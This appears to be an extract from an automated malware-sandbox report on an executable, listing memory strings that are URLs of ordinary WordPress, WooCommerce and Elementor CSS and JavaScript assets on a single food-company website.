              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.62
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=8.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-all-blocks-s
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1694553308
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1694553266
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1694553266
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1694553266
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.0
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=26c380492a5e27db8a41
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=26c380492a5e27db8a412ecd
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26c380492a5e27db8a412ecdd
